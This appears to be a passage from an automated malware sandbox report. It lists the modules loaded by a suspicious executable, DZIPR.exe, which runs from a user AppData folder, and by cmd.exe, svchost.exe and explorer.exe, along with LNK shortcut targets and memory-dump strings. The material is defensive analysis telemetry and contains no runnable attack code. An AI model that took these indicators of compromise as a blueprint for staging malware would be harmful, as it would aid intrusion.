Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dzipr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dzipr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dzipr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: shdocvw.dll	Jump to behavior

Source: MdkbG2pK4l.lnk	LNK file: ..\Windows\System32\cmd.exe
Source: wanynpfhxudgrp.14.dr	LNK file: ..\..\..\..\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Source: BITE1BA.tmp.18.dr	LNK file: ..\..\..\..\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: msacm32.pdbUGP source: cmd.exe, 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679113605.0000000000522000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827274368.00000000005D8000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2008758965.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000021.00000002.2074919506.0000000000392000.00000008.00000001.01000000.00000000.sdmp, lejp.20.dr, gnqpmvvlbu.24.dr
Source:	Binary string: msacm32.pdb source: cmd.exe, 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679113605.0000000000522000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827274368.00000000005D8000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2008758965.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000021.00000002.2074919506.0000000000392000.00000008.00000001.01000000.00000000.sdmp, lejp.20.dr, gnqpmvvlbu.24.dr
